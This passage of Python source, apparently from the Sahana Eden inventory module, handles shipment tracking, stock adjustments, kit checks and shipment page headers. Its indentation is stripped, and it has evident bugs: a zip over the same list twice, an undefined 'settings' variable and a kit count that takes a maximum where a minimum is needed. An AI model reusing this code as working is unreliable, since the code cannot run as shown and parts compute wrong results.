pdf_hide_comments=True,
pdf_componentname = "track_item",
**attr
)
# -------------------------------------------------------------------------
@staticmethod
def qnty_recv_repr(value):
if value:
return value
else:
return B(value)
# ---------------------------------------------------------------------
@staticmethod
def inv_send_ref_represent(value, show_link=True):
"""
Represent for the Tall Out number,
if show_link is True then it will generate a link to the pdf
"""
if value:
if show_link:
db = current.db
table = db.inv_send
row = db(table.send_ref == value).select(table.id,
limitby=(0, 1)).first()
if row:
return A(value,
_href = URL(c = "inv",
f = "send",
args = [row.id, "form"]
),
)
else:
return value
else:
return value
else:
return current.messages["NONE"]
# ---------------------------------------------------------------------
@staticmethod
def inv_recv_ref_represent(value, show_link=True):
"""
Represent for the Goods Received Note
if show_link is True then it will generate a link to the pdf
"""
if value:
if show_link:
db = current.db
table = db.inv_recv
recv_row = db(table.recv_ref == value).select(table.id,
limitby=(0, 1)).first()
return A(value,
_href = URL(c = "inv",
f = "recv",
args = [recv_row.id, "form"]
),
)
else:
return B(value)
else:
return current.messages["NONE"]
# -------------------------------------------------------------------------
@staticmethod
def inv_track_item_onvalidate(form):
"""
When a track item record is being created with a tracking number
then the tracking number needs to be unique within the organisation.
If the inv. item is coming out of a warehouse then the inv. item details
need to be copied across (org, expiry etc)
If the inv. item is being received then their might be a selected bin
ensure that the correct bin is selected and save those details.
"""
vars = form.vars
send_inv_item_id = vars.send_inv_item_id
if send_inv_item_id:
# Copy the data from the sent inv_item
db = current.db
itable = db.inv_inv_item
query = (itable.id == send_inv_item_id)
record = db(query).select(limitby=(0, 1)).first()
vars.item_id = record.item_id
vars.item_source_no = record.item_source_no
vars.expiry_date = record.expiry_date
vars.bin = record.bin
vars.owner_org_id = record.owner_org_id
vars.supply_org_id = record.supply_org_id
vars.pack_value = record.pack_value
vars.currency = record.currency
vars.inv_item_status = record.status
# Save the organisation from where this tracking originates
stable = current.s3db.org_site
query = query & (itable.site_id == stable.id)
record = db(query).select(stable.organisation_id,
limitby=(0, 1)).first()
vars.track_org_id = record.organisation_id
if not vars.recv_quantity:
# If we have no send_id and no recv_quantity then
# copy the quantity sent directly into the received field
# This is for when there is no related send record
# The Quantity received ALWAYS defaults to the quantity sent
# (Please do not change this unless there is a specific user requirement)
#db.inv_track_item.recv_quantity.default = form.vars.quantity
vars.recv_quantity = vars.quantity
recv_bin = vars.recv_bin
if recv_bin:
# If there is a receiving bin then select the right one
if isinstance(recv_bin, list):
if recv_bin[1] != "":
recv_bin = recv_bin[1]
else:
recv_bin = recv_bin[0]
return
# -------------------------------------------------------------------------
@staticmethod
def inv_kit_onvalidate(form):
"""
Check that we have sufficient inv_item in stock to build the kits
"""
vars = form.vars
db = current.db
s3db = current.s3db
ktable = s3db.supply_kit_item
ptable = db.supply_item_pack
invtable = db.inv_inv_item
# The Facility at which we're building these kits
squery = (invtable.site_id == vars.site_id)
# Get contents of this kit
query = (ktable.parent_item_id == vars.item_id)
rows = db(query).select(ktable.item_id,
ktable.quantity,
ktable.item_pack_id)
quantity = vars.quantity
max_kits = 0
# @ToDo: Save the results for the onaccept
#items = {}
# Loop through each supply_item in the kit
for record in rows:
# How much of this supply_item is required per kit?
one_kit = record.quantity * ptable[record.item_pack_id].quantity
# How much of this supply_item do we have in stock?
stock_amount = 0
query = squery & (invtable.item_id == record.item_id)
wh_items = db(query).select(invtable.quantity,
invtable.item_pack_id)
for wh_item in wh_items:
amount = wh_item.quantity * ptable[wh_item.item_pack_id].quantity
stock_amount += amount
# How many Kits can we create?
kits = stock_amount / one_kit
if kits > max_kits:
max_kits = kits
# @ToDo: Save the results for the onaccept
if max_kits < quantity:
form.errors.quantity = current.T("You can only make %d kit(s) with the available stock") % \
int(max_kits)
return
# -------------------------------------------------------------------------
@staticmethod
def inv_kit_onaccept(form):
"""
Reduce the Inventory stocks by the amounts used to make the kits
- pick items which have an earlier expiry_date where they have them
- provide a pick list to ensure that the right stock items are used
to build the kits: inv_kit_item
"""
# @ToDo
return
# -------------------------------------------------------------------------
@staticmethod
def inv_track_item_onaccept(form):
"""
When a track item record is created and it is linked to an inv_item
then the inv_item quantity will be reduced.
"""
db = current.db
s3db = current.s3db
tracktable = db.inv_track_item
inv_item_table = db.inv_inv_item
stable = db.inv_send
rtable = db.inv_recv
siptable = db.supply_item_pack
supply_item_add = s3db.supply_item_add
form_vars = form.vars
id = form_vars.id
record = form.record
if form_vars.send_inv_item_id:
stock_item = db(inv_item_table.id == form_vars.send_inv_item_id).select(inv_item_table.id,
inv_item_table.quantity,
inv_item_table.item_pack_id,
limitby=(0, 1)).first()
elif record:
stock_item = record.send_inv_item_id
else:
# will get here for a recv (from external donor / local supplier)
stock_item = None
# Modify the original inv. item total only if we have a quantity on the form
# and a stock item to take it from.
# There will not be a quantity if it is being received since by then it is read only
# It will be there on an import and so the value will be deducted correctly
if form_vars.quantity and stock_item:
stock_quantity = stock_item.quantity
stock_pack = db(siptable.id == stock_item.item_pack_id).select(siptable.quantity,
limitby=(0, 1)
).first().quantity
if record:
if record.send_inv_item_id != None:
# Items have already been removed from stock, so first put them back
old_track_pack_quantity = db(siptable.id == record.item_pack_id).select(siptable.quantity,
limitby=(0, 1)
).first().quantity
stock_quantity = supply_item_add(stock_quantity,
stock_pack,
record.quantity,
old_track_pack_quantity
)
try:
new_track_pack_quantity = db(siptable.id == form_vars.item_pack_id).select(siptable.quantity,
limitby=(0, 1)
).first().quantity
except:
new_track_pack_quantity = record.item_pack_id.quantity
newTotal = supply_item_add(stock_quantity,
stock_pack,
- float(form_vars.quantity),
new_track_pack_quantity
)
db(inv_item_table.id == stock_item).update(quantity = newTotal)
if form_vars.send_id and form_vars.recv_id:
send_ref = db(stable.id == form_vars.send_id).select(stable.send_ref,
limitby=(0, 1)
).first().send_ref
db(rtable.id == form_vars.recv_id).update(send_ref = send_ref)
rrtable = s3db.table("req_req")
if rrtable:
use_req = True
ritable = s3db.req_req_item
else:
# Req module deactivated
use_req = False
# If this item is linked to a request, then copy the req_ref to the send item
if use_req and record and record.req_item_id:
req_id = db(ritable.id == record.req_item_id).select(ritable.req_id,
limitby=(0, 1)
).first().req_id
req_ref = db(rrtable.id == req_id).select(rrtable.req_ref,
limitby=(0, 1)
).first().req_ref
db(stable.id == form_vars.send_id).update(req_ref = req_ref)
if form_vars.recv_id:
db(rtable.id == form_vars.recv_id).update(req_ref = req_ref)
# If the status is 'unloading':
# Move all the items into the site, update any request & make any adjustments
# Finally change the status to 'arrived'
if record and record.status == TRACK_STATUS_UNLOADING and \
record.recv_quantity:
# Look for the item in the site already
recv_rec = db(rtable.id == record.recv_id).select(rtable.site_id,
rtable.type,
).first()
recv_site_id = recv_rec.site_id
query = (inv_item_table.site_id == recv_site_id) & \
(inv_item_table.item_id == record.item_id) & \
(inv_item_table.item_pack_id == record.item_pack_id) & \
(inv_item_table.currency == record.currency) & \
(inv_item_table.status == record.inv_item_status) & \
(inv_item_table.pack_value == record.pack_value) & \
(inv_item_table.expiry_date == record.expiry_date) & \
(inv_item_table.bin == record.recv_bin) & \
(inv_item_table.owner_org_id == record.owner_org_id) & \
(inv_item_table.item_source_no == record.item_source_no) & \
(inv_item_table.status == record.inv_item_status) & \
(inv_item_table.supply_org_id == record.supply_org_id)
inv_item_row = db(query).select(inv_item_table.id,
limitby=(0, 1)).first()
if inv_item_row:
# Update the existing item
inv_item_id = inv_item_row.id
db(inv_item_table.id == inv_item_id).update(quantity = inv_item_table.quantity + record.recv_quantity)
else:
# Add a new item
source_type = 0
if form_vars.send_inv_item_id:
source_type = db(inv_item_table.id == form_vars.send_inv_item_id).select(inv_item_table.source_type,
limitby=(0, 1)
).first().source_type
else:
if recv_rec.type == 2:
source_type = 1 # Donation
else:
source_type = 2 # Procured
inv_item_id = inv_item_table.insert(site_id = recv_site_id,
item_id = record.item_id,
item_pack_id = record.item_pack_id,
currency = record.currency,
pack_value = record.pack_value,
expiry_date = record.expiry_date,
bin = record.recv_bin,
owner_org_id = record.owner_org_id,
supply_org_id = record.supply_org_id,
quantity = record.recv_quantity,
item_source_no = record.item_source_no,
source_type = source_type,
status = record.inv_item_status,
)
# If this item is linked to a request, then update the quantity fulfil
if use_req and record.req_item_id:
req_item = db(ritable.id == record.req_item_id).select(ritable.quantity_fulfil,
ritable.item_pack_id,
limitby=(0, 1)
).first()
req_quantity = req_item.quantity_fulfil
req_pack_quantity = db(siptable.id == req_item.item_pack_id).select(siptable.quantity,
limitby=(0, 1)
).first().quantity
track_pack_quantity = db(siptable.id == record.item_pack_id).select(siptable.quantity,
limitby=(0, 1)
).first().quantity
quantity_fulfil = supply_item_add(req_quantity,
req_pack_quantity,
record.recv_quantity,
track_pack_quantity
)
db(ritable.id == record.req_item_id).update(quantity_fulfil = quantity_fulfil)
s3db.req_update_status(req_id)
db(tracktable.id == id).update(recv_inv_item_id = inv_item_id,
status = TRACK_STATUS_ARRIVED)
# If the receive quantity doesn't equal the sent quantity
# then an adjustment needs to be set up
if record.quantity != record.recv_quantity:
# Do we have an adjustment record?
# (which might have be created for another item in this shipment)
query = (tracktable.recv_id == record.recv_id) & \
(tracktable.adj_item_id != None)
adj_rec = db(query).select(tracktable.adj_item_id,
limitby = (0, 1)).first()
adjitemtable = s3db.inv_adj_item
if adj_rec:
adj_id = db(adjitemtable.id == adj_rec.adj_item_id).select(adjitemtable.adj_id,
limitby=(0, 1)
).first().adj_id
# If we don't yet have an adj record then create it
else:
adjtable = s3db.inv_adj
irtable = s3db.inv_recv
recv_rec = db(irtable.id == record.recv_id).select(irtable.recipient_id,
irtable.site_id,
irtable.comments,
limitby=(0, 1)).first()
adj_id = adjtable.insert(adjuster_id = recv_rec.recipient_id,
site_id = recv_rec.site_id,
adjustment_date = current.request.now.date(),
category = 0,
status = 1,
comments = recv_rec.comments,
)
# Now create the adj item record
adj_item_id = adjitemtable.insert(reason = 0,
adj_id = adj_id,
inv_item_id = record.send_inv_item_id, # original source inv_item
item_id = record.item_id, # the supply item
item_pack_id = record.item_pack_id,
old_quantity = record.quantity,
new_quantity = record.recv_quantity,
currency = record.currency,
old_pack_value = record.pack_value,
new_pack_value = record.pack_value,
expiry_date = record.expiry_date,
bin = record.recv_bin,
comments = record.comments,
)
# Copy the adj_item_id to the tracking record
db(tracktable.id == id).update(adj_item_id = adj_item_id)
# -------------------------------------------------------------------------
@staticmethod
def inv_track_item_deleting(id):
"""
A track item can only be deleted if the status is Preparing
When a track item record is deleted and it is linked to an inv_item
then the inv_item quantity will be reduced.
"""
db = current.db
s3db = current.s3db
tracktable = db.inv_track_item
inv_item_table = db.inv_inv_item
ritable = s3db.req_req_item
siptable = db.supply_item_pack
record = tracktable[id]
if record.status != 1:
return False
# if this is linked to a request
# then remove these items from the quantity in transit
if record.req_item_id:
req_id = record.req_item_id
req_item = ritable[req_id]
req_quantity = req_item.quantity_transit
req_pack_quantity = siptable[req_item.item_pack_id].quantity
track_pack_quantity = siptable[record.item_pack_id].quantity
quantity_transit = s3db.supply_item_add(req_quantity,
req_pack_quantity,
- record.quantity,
track_pack_quantity
)
db(ritable.id == req_id).update(quantity_transit = quantity_transit)
s3db.req_update_status(req_id)
# Check that we have a link to a warehouse
if record.send_inv_item_id:
trackTotal = record.quantity
# Remove the total from this record and place it back in the warehouse
db(inv_item_table.id == record.send_inv_item_id).update(quantity = inv_item_table.quantity + trackTotal)
db(tracktable.id == id).update(quantity = 0,
comments = "%sQuantity was: %s" % (inv_item_table.comments, trackTotal))
return True
# -------------------------------------------------------------------------
@staticmethod
def inv_timeline(r, **attr):
"""
Display the Incidents on a Simile Timeline
http://www.simile-widgets.org/wiki/Reference_Documentation_for_Timeline
@ToDo: Play button
http://www.simile-widgets.org/wiki/Timeline_Moving_the_Timeline_via_Javascript
"""
if r.representation == "html" and (r.name == "recv" or \
r.name == "send"):
T = current.T
request = current.request
response = current.response
s3 = response.s3
# Add core Simile Code
s3.scripts.append("/%s/static/scripts/simile/timeline/timeline-api.js" % request.application)
# Add our controlled script
if s3.debug:
s3.scripts.append("/%s/static/scripts/S3/s3.timeline.js" % request.application)
else:
s3.scripts.append("/%s/static/scripts/S3/s3.timeline.min.js" % request.application)
# Add our data
# @ToDo: Make this the initial data & then collect extra via REST with a stylesheet
# add in JS using S3.timeline.eventSource.addMany(events) where events is a []
db = current.db
rows1 = db(db.inv_send.id > 0).select() # select rows from inv_send
rows2 = db(db.inv_recv.id > 0).select() # select rows form inv_recv
if r.record:
# Single record
rows = [r.record]
else:
# Multiple records
# @ToDo: Load all records & sort to closest in time
# http://stackoverflow.com/questions/7327689/how-to-generate-a-sequence-of-future-datetimes-in-python-and-determine-nearest-d
r.resource.load(limit=2000)
rows = r.resource._rows
data = {"dateTimeFormat": "iso8601",
}
now = request.utcnow
tl_start = tl_end = now
events = []
if r.name is "send":
rr = (rows, rows2)
else:
rr = (rows1, rows)
for (row_send, row_recv) in itertools.izip_longest(rr[0], rr[0]):
# send Dates
start = row_send.date or ""
if start:
if start < tl_start:
tl_start = start
if start > tl_end:
tl_end = start
start = start.isoformat()
# recv date
end = row_recv.date or ""
if end:
if end > tl_end:
tl_end = end
end = end.isoformat()
# append events
events.append({"start": start,
"end": end,
#"title": row.name,
#"caption": row.comments or "",
#"description": row.comments or "",
# @ToDo: Colour based on Category (More generically: Resource or Resource Type)
# "color" : "blue",
})
data["events"] = events
data = json.dumps(data, separators=SEPARATORS)
code = "".join((
'''S3.timeline.data=''', data, '''
S3.timeline.tl_start="''', tl_start.isoformat(), '''"
S3.timeline.tl_end="''', tl_end.isoformat(), '''"
S3.timeline.now="''', now.isoformat(), '''"
'''))
# Control our code in static/scripts/S3/s3.timeline.js
s3.js_global.append(code)
# Create the DIV
item = DIV(_id="s3timeline", _class="s3-timeline")
output = dict(item = item)
# Maintain RHeader for consistency
if "rheader" in attr:
rheader = attr["rheader"](r)
if rheader:
output["rheader"] = rheader
output["title"] = T("Incident Timeline")
response.view = "timeline.html"
return output
else:
raise HTTP(501, "bad method")
# =============================================================================
def inv_tabs(r):
"""
Add an expandable set of Tabs for a Site's Inventory Tasks
@ToDo: Make these Expand/Contract without a server-side call
"""
settings = current.deployment_settings
if settings.get_org_site_inv_req_tabs():
if settings.has_module("inv") and \
current.auth.s3_has_permission("read", "inv_inv_item", c="inv"):
T = current.T
s3 = current.session.s3
collapse_tabs = settings.get_inv_collapse_tabs()
tablename = s3_rheader_resource(r)[0]
if collapse_tabs and not (tablename == "inv_warehouse"):
# Test if the tabs are collapsed
show_collapse = True
show_inv = r.get_vars.show_inv
if show_inv == "True":
show_inv = True
elif show_inv == "False":
show_inv = False
else:
show_inv = None
if show_inv == True or show_inv == False:
if not s3.show_inv:
s3.show_inv = Storage()
s3.show_inv["%s_%s" % (r.name, r.id)] = show_inv
elif s3.show_inv:
show_inv = s3.show_inv.get("%s_%s" % (r.name, r.id))
else:
show_inv = False
else:
show_inv = True
show_collapse = False
if show_inv:
if settings.get_inv_shipment_name() == "order":
recv_tab = T("Orders")
else:
recv_tab = T("Receive")
inv_tabs = [(T("Stock"), "inv_item"),
#(T("Incoming"), "incoming/"),
(recv_tab, "recv"),
(T("Send"), "send"),
]
if settings.has_module("proc"):
inv_tabs.append((T("Planned Procurements"), "plan"))
if show_collapse:
inv_tabs.append(("- %s" % T("Warehouse"),
None, dict(show_inv="False")))
else:
inv_tabs = [("+ %s" % T("Warehouse"), "inv_item",
dict(show_inv="True"))]
return inv_tabs
return []
# =============================================================================
def inv_rheader(r):
""" Resource Header for Warehouses and Inventory Items """
if r.representation != "html" or r.method == "import":
# RHeaders only used in interactive views
return None
# Need to use this format as otherwise req_match?viewing=org_office.x
# doesn't have an rheader
tablename, record = s3_rheader_resource(r)
if not record:
# List or Create form: rheader makes no sense here
return None
T = current.T
s3db = current.s3db
table = s3db.table(tablename)
rheader = None
if tablename == "inv_warehouse":
# Tabs
tabs = [(T("Basic Details"), None),
#(T("Contact Data"), "contact"),
]
settings = current.deployment_settings
if settings.has_module("hrm"):
STAFF = settings.get_hrm_staff_label()
tabs.append((STAFF, "human_resource"))
permit = current.auth.s3_has_permission
if permit("create", "hrm_human_resource_site") and \
permit("update", tablename, r.id):
tabs.append((T("Assign %(staff)s") % dict(staff=STAFF), "assign"))
if settings.has_module("asset"):
tabs.insert(6,(T("Assets"), "asset"))
tabs = tabs + s3db.inv_tabs(r)
if settings.has_module("req"):
tabs = tabs + s3db.req_tabs(r)
tabs.append((T("Attachments"), "document"))
tabs.append((T("User Roles"), "roles"))
# Fields
rheader_fields = [["name", "organisation_id", "email"],
["location_id", "phone1"],
]
rheader = S3ResourceHeader(rheader_fields, tabs)
rheader_fields, rheader_tabs = rheader(r, table=table, record=record)
# Inject logo
logo = s3db.org_organisation_logo(record.organisation_id)
if logo:
rheader = DIV(TABLE(TR(TD(logo),TD(rheader_fields))))
else:
rheader = DIV(rheader_fields)
rheader.append(rheader_tabs)
elif tablename == "inv_inv_item":
# Tabs
tabs = [(T("Details"), None),
(T("Track Shipment"), "track_movement/"),
]
rheader_tabs = DIV(s3_rheader_tabs(r, tabs))
# Header
rheader = DIV(
TABLE(
TR(TH("%s: " % table.item_id.label),
table.item_id.represent(record.item_id),
TH("%s: " % table.item_pack_id.label),
table.item_pack_id.represent(record.item_pack_id),
),
TR(TH("%s: " % table.site_id.label),
TD(table.site_id.represent(record.site_id),
_colspan=3),
),
), rheader_tabs)
elif tablename == "inv_track_item":
# Tabs
tabs = [(T("Details"), None),
(T("Track Shipment"), "inv_item/"),
]
rheader_tabs = DIV(s3_rheader_tabs(r, tabs))
# Get site data
table = s3db.inv_inv_item
irecord = current.db(table.id == record.send_inv_item_id).select(
table.site_id,
limitby=(0, 1)).first()
# Header
if irecord:
rheader = DIV(
TABLE(
TR(TH("%s: " % table.item_id.label),
table.item_id.represent(record.item_id),
TH("%s: " % table.item_pack_id.label),
table.item_pack_id.represent(record.item_pack_id),
),
TR(TH( "%s: " % table.site_id.label),
TD(table.site_id.represent(irecord.site_id),
_colspan=3),
),
), rheader_tabs)
else:
rheader = DIV(
TABLE(
TR(TH("%s: " % table.item_id.label),
table.item_id.represent(record.item_id),
TH("%s: " % table.item_pack_id.label),
table.item_pack_id.represent(record.item_pack_id),
),
), rheader_tabs)
# Build footer
inv_rfooter(r, record)
return rheader
# =============================================================================
def inv_rfooter(r, record):
""" Resource Footer for Warehouses and Inventory Items """
if "site_id" not in record:
return
if (r.component and r.component.name == "inv_item"):
T = current.T
rfooter = TAG[""]()
component_id = r.component_id
if not current.deployment_settings.get_inv_direct_stock_edits() and \
current.auth.s3_has_permission("update", "inv_warehouse", r.id):
if component_id:
asi_btn = A(T("Adjust Stock Item"),
_href = URL(c = "inv",
f = "adj",
args = ["create"],
vars = {"site": record.site_id,
"item": component_id},
),
_class = "action-btn"
)
rfooter.append(asi_btn)
else:
as_btn = A(T("Adjust Stock"),
_href = URL(c = "inv",
f = "adj",
args = ["create"],
vars = {"site": record.site_id},
),
_class = "action-btn"
)
rfooter.append(as_btn)
if component_id:
ts_btn = A(T("Track Shipment"),
_href = URL(c = "inv",
f = "track_movement",
vars = {"viewing": "inv_item.%s" % component_id},
),
_class = "action-btn"
)
rfooter.append(ts_btn)
current.response.s3.rfooter = rfooter
# =============================================================================
def inv_recv_crud_strings():
"""
CRUD Strings for inv_recv which need to be visible to menus without a
model load
"""
T = current.T
if current.deployment_settings.get_inv_shipment_name() == "order":
#recv_id_label = T("Order")
ADD_RECV = T("Add Order")
current.response.s3.crud_strings["inv_recv"] = Storage(
label_create = ADD_RECV,
title_display = T("Order Details"),
title_list = T("Orders"),
title_update = T("Edit Order"),
label_list_button = T("List Orders"),
label_delete_button = T("Delete Order"),
msg_record_created = T("Order Created"),
msg_record_modified = T("Order updated"),
msg_record_deleted = T("Order canceled"),
msg_list_empty = T("No Orders registered")
)
else:
#recv_id_label = T("Receive Shipment")
ADD_RECV = T("Receive New Shipment")
current.response.s3.crud_strings["inv_recv"] = Storage(
label_create = ADD_RECV,
title_display = T("Received Shipment Details"),
title_list = T("Received/Incoming Shipments"),
title_update = T("Shipment to Receive"),
label_list_button = T("List Received/Incoming Shipments"),
label_delete_button = T("Delete Received Shipment"),
msg_record_created = T("Shipment Created"),
msg_record_modified = T("Received Shipment updated"),
msg_record_deleted = T("Received Shipment canceled"),
msg_list_empty = T("No Received Shipments")
)
return
# =============================================================================
def inv_send_rheader(r):
""" Resource Header for Send """
if r.representation == "html" and r.name == "send":
record = r.record
if record:
db = current.db
s3db = current.s3db
T = current.T
s3 = current.response.s3
tabs = [(T("Edit Details"), None),
(T("Items"), "track_item"),
]
rheader_tabs = s3_rheader_tabs(r, tabs)
table = r.table
stable = s3db.org_site
send_id = record.id
status = record.status
site_id = record.site_id
if site_id:
site = db(stable.site_id == site_id).select(stable.organisation_id,
stable.instance_type,
limitby=(0, 1)
).first()
org_id = site.organisation_id
logo = s3db.org_organisation_logo(org_id) or ""
instance_table = s3db[site.instance_type]
if "phone1" in instance_table.fields:
site = db(instance_table.site_id == site_id).select(instance_table.phone1,
instance_table.phone2,
limitby=(0, 1)
).first()
phone1 = site.phone1
phone2 = site.phone2
else:
phone1 = None
phone2 = None
else:
org_id = None
logo = ""
phone1 = None
phone2 = None
to_site_id = record.to_site_id
if to_site_id:
site = db(stable.site_id == to_site_id).select(stable.location_id,
limitby=(0, 1)
).first()
address = s3db.gis_LocationRepresent(address_only=True)(site.location_id)
else:
address = current.messages["NONE"]
rData = TABLE(TR(TD(T(settings.get_inv_send_form_name().upper()),
_colspan=2, _class="pdf_title"),
TD(logo, _colspan=2),
),
TR(TH("%s: " % table.status.label),
table.status.represent(status),
),
TR(TH("%s: " % table.send_ref.label),
TD(table.send_ref.represent(record.send_ref)),
TH("%s: " % table.req_ref.label),
TD(table.req_ref.represent(record.req_ref)),
),
TR(TH("%s: " % table.date.label),
table.date.represent(record.date),
TH("%s: " % table.delivery_date.label),
table.delivery_date.represent(record.delivery_date),
),
TR(TH("%s: " % table.to_site_id.label),
table.to_site_id.represent(record.to_site_id),
TH("%s: " % table.site_id.label),
table.site_id.represent(record.site_id),
),
TR(TH("%s: " % T("Address")),
TD(address, _colspan=3),
),
TR(TH("%s: " % table.transported_by.label),
table.transported_by.represent(record.transported_by),
TH("%s: " % table.transport_ref.label),
table.transport_ref.represent(record.transport_ref),
),
TR(TH("%s: " % table.sender_id.label),
table.sender_id.represent(record.sender_id),
TH("%s: " % table.recipient_id.label),
table.recipient_id.represent(record.recipient_id),
),
TR(TH("%s: " % T("Complete? Please call")),
phone1 or "",
TH("%s: " % T("Problems? Please call")),
phone2 or phone1 or "",
),
TR(TH("%s: " % table.comments.label),
TD(record.comments or "", _colspan=3)
)
)
# Find out how many inv_track_items we have for this send record
tracktable = s3db.inv_track_item
query = (tracktable.send_id == send_id) & \
(tracktable.deleted == False)
#cnt = db(query).count()
cnt = db(query).select(tracktable.id, limitby=(0, 1)).first()
if cnt:
cnt = 1
else:
cnt = 0
action = DIV()
#rSubdata = TABLE()
rfooter = TAG[""]()
if status == SHIP_STATUS_IN_PROCESS:
if current.auth.s3_has_permission("update",
"inv_send",
record_id=record.id):
if cnt > 0:
action.append(A(T("Send Shipment"),
_href = URL(f = "send_process",
args = [record.id]
),
_id = "send_process",
_class = "action-btn"
)
)
s3.jquery_ready.append('''S3.confirmClick("#send_process","%s")''' \
% T("Do you want to send this shipment?"))
#if not r.component and not r.method == "form":
# ritable = s3db.req_req_item
# rcitable = s3db.req_commit_item
# query = (tracktable.send_id == record.id) & \
# (rcitable.req_item_id == tracktable.req_item_id) & \
# (tracktable.req_item_id == ritable.id) & \
# (tracktable.deleted == False)
# records = db(query).select()
# for record in records:
# rSubdata.append(TR(TH("%s: " % ritable.item_id.label),
# ritable.item_id.represent(record.req_req_item.item_id),
# TH("%s: " % rcitable.quantity.label),
# record.req_commit_item.quantity,
# ))
elif status == SHIP_STATUS_RETURNING:
if cnt > 0:
action.append(A(T("Complete Returns"),
_href = URL(c = "inv",
f = "return_process",
args = [record.id]
),
_id = "return_process",
_class = "action-btn"
)
)
s3.jquery_ready.append('''S3.confirmClick("#return_process","%s")''' \
% T("Do you want to complete the return process?") )
else:
msg = T("You need to check all item quantities before you can complete the return process")
rfooter.append(SPAN(msg))
elif status != SHIP_STATUS_CANCEL:
if status == SHIP_STATUS_SENT:
jappend = s3.jquery_ready.append
s3_has_permission = current.auth.s3_has_permission
if s3_has_permission("update",
"inv_send",
record_id=record.id):
action.append(A(T("Manage Returns"),
_href = URL(c = "inv",
f = "send_returns",
args = [record.id],
vars = None,
),
_id = "send_return",
_class = "action-btn",
_title = T("Only use this button to accept back into stock some items that were returned from a delivery to beneficiaries who do not record the shipment details directly into the system")
)
)
jappend('''S3.confirmClick("#send_return","%s")''' \
% T("Confirm that some items were returned from a delivery to beneficiaries and they will be accepted back into stock."))
action.append(A(T("Confirm Shipment Received"),
_href = URL(f = "send",
args = [record.id],
vars = {"received": 1},
),
_id = "send_receive",
_class = "action-btn",
_title = T("Only use this button to confirm that the shipment has been received by a destination which will not record the shipment directly into the system")
)
)
jappend('''S3.confirmClick("#send_receive","%s")''' \
% T("Confirm that the shipment has been received by a destination which will not record the shipment directly into the system and confirmed as received.") )
if s3_has_permission("delete",
"inv_send",
record_id=record.id):
action.append(A(T("Cancel Shipment"),
_href = URL(c = "inv",
f = "send_cancel",
args = [record.id]
),
_id = "send_cancel",
_class = "action-btn"
)
)
jappend('''S3.confirmClick("#send_cancel","%s")''' \
% T("Do you want to cancel this sent shipment? The items will be returned to the Warehouse. This action CANNOT be undone!") )
if not r.method == "form":
# msg = ""
# if cnt == 1:
# msg = T("One item is attached to this shipment")
# elif cnt > 1:
# msg = T("%s items are attached to this shipment") % cnt
# rData.append(TR(TH(action, _colspan=2),
# TD(msg)))
rData.append(TR(TH(action, _colspan=2)))
s3.rfooter = rfooter
rheader = DIV(rData,
rheader_tabs,
#rSubdata
)
return rheader
return None
# ---------------------------------------------------------------------
def inv_send_pdf_footer(r):
"""
Footer for the Waybill
"""
if r.record:
T = current.T
footer = DIV(TABLE(TR(TH(T("Commodities Loaded")),
TH(T("Date")),
TH(T("Function")),
TH(T("Name")),
TH(T("Signature")),
TH(T("Location (Site)")),
TH(T("Condition")),
),
TR(TD(T("Loaded By")),
TD(),
TD(),
TD(),
TD(),
TD(),
TD(),
),
TR(TD(T("Transported By")),
TD(),
TD(),
TD(),
TD(),
TD(),
TD(),
),
TR(TH(T("Reception")),
TH(T("Date")),
TH(T("Function")),
TH(T("Name")),
TH(T("Signature")),
TH(T("Location (Site)")),
TH(T("Condition")),
),
TR(TD(T("Received By")),
TD(),
TD(),
TD(),
TD(),
TD(),
TD(),
),
))
return footer
return None
# =============================================================================
def inv_recv_rheader(r):
""" Resource Header for Receiving """
if r.representation == "html" and r.name == "recv":
record = r.record
if record:
T = current.T
s3db = current.s3db
tabs = [(T("Edit Details"), None),
(T("Items"), "track_item"),
]
rheader_tabs = s3_rheader_tabs(r, tabs)
table = r.table
tracktable = s3db.inv_track_item
recv_id = record.id
site_id = record.site_id
org_id = s3db.org_site[site_id].organisation_id
logo = s3db.org_organisation_logo(org_id)
rData = TABLE(TR(TD(T(current.deployment_settings.get_inv_recv_form_name()),
_colspan=2, _class="pdf_title"),
TD(logo, _colspan=2),
),
TR(TH("%s: " % table.recv_ref.label),
TD(table.recv_ref.represent(record.recv_ref))
),
TR(TH("%s: " % table.status.label),
table.status.represent(record.status),
),
TR(TH("%s: " % table.eta.label),
table.eta.represent(record.eta),
TH("%s: " % table.date.label),
table.date.represent(record.date),
),
TR(TH("%s: " % table.from_site_id.label),
table.from_site_id.represent(record.from_site_id),
TH("%s: " % table.site_id.label),
table.site_id.represent(record.site_id),
),
TR(TH("%s: " % table.sender_id.label),
s3_fullname(record.sender_id),
TH("%s: " % table.recipient_id.label),
s3_fullname(record.recipient_id),
),
TR(TH("%s: " % table.send_ref.label),
table.send_ref.represent(record.send_ref),
TH("%s: " % table.recv_ref.label),
table.recv_ref.represent(record.recv_ref),
),
TR(TH("%s: " % table.comments.label),
TD(record.comments or "", _colspan=3),
),
)
rfooter = TAG[""]()
action = DIV()
# Find out how many inv_track_items we have for this recv record
query = (tracktable.recv_id == recv_id) & \
(tracktable.deleted == False)
cnt = current.db(query).count()
if record.status == SHIP_STATUS_SENT or \
record.status == SHIP_STATUS_IN_PROCESS:
if current.auth.s3_has_permission("update",
"inv_recv",
record_id=record.id):
if cnt > 0:
action.append(A(T("Receive Shipment"),
_href = URL(c = "inv",
f = "recv_process",
args = [record.id]
),
_id = "recv_process",
_class = "action-btn"
))
recv_btn_confirm = SCRIPT("S3.confirmClick('#recv_process', '%s')"
% T("Do you want to receive this shipment?") )
rfooter.append(recv_btn_confirm)
else:
msg = T("You need to check all item quantities and allocate to bins before you can receive the shipment")
rfooter.append(SPAN(msg))
# FB: Removed as serves no useful purpose & AusRC complained about it
#else:
# if record.status == SHIP_STATUS_RECEIVED:
# if current.auth.s3_has_permission("delete",
# "inv_recv",
# record_id=record.id):
# action.append(A(T("Cancel Shipment"),
# _href = URL(c = "inv",
# f = "recv_cancel",
# args = [record.id]
# ),
# _id = "recv_cancel",
# _class = "action-btn"
# ))
# cancel_btn_confirm = SCRIPT("S3.confirmClick('#recv_cancel', '%s')"
# % T("Do you want to cancel this received shipment? The items will be removed from the Warehouse. This action CANNOT be undone!") )
# rfooter.append(cancel_btn_confirm)
msg = ""
if cnt == 1:
msg = T("This shipment contains one line item")
elif cnt > 1:
msg = T("This shipment contains %s items") % cnt
rData.append(TR(TH(action,
_colspan=2),
TD(msg)
))
current.response.s3.rfooter = rfooter
rheader = DIV(rData,
rheader_tabs,
)
return rheader
return None
# ---------------------------------------------------------------------
def inv_recv_pdf_footer(r):
"""
